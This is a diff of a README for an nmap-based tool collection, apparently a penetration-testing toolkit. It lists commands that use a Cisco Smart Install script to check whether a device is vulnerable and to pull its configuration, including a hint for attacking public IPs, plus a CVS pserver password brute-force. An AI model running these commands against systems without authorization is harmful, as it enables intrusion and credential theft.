jakuta-tech/WNMAP/README.md

 ### Cisco - Cvs - Test whether host is vulnerable or not

     nmap -p 4786 -v 192.168.0.1 # By default, it will just test whether host is vulnerable or not nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse

 ### You can pass argument to get config

-# If you are attacking public ip, make sure to provide your public ip to the script (cisco-siet.addr=<PUBLIC_IP>)
+If you are attacking public ip, make sure to provide your public ip to the script (cisco-siet.addr=<PUBLIC_IP>)

     nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse --script-args "cisco-siet.get"

 ### Cvs - Brute-Force

 _Performs Brute-Force password auditing against CVS pserver authentication_

-     root@hostname: ~/ # nmap -p 2401 --script cvs-brute 192.168.1.12
+     nmap -p 2401 --script cvs-brute 192.168.1.12

      |2401/tcp open  cvspserver syn-ack
      | cvs-brute: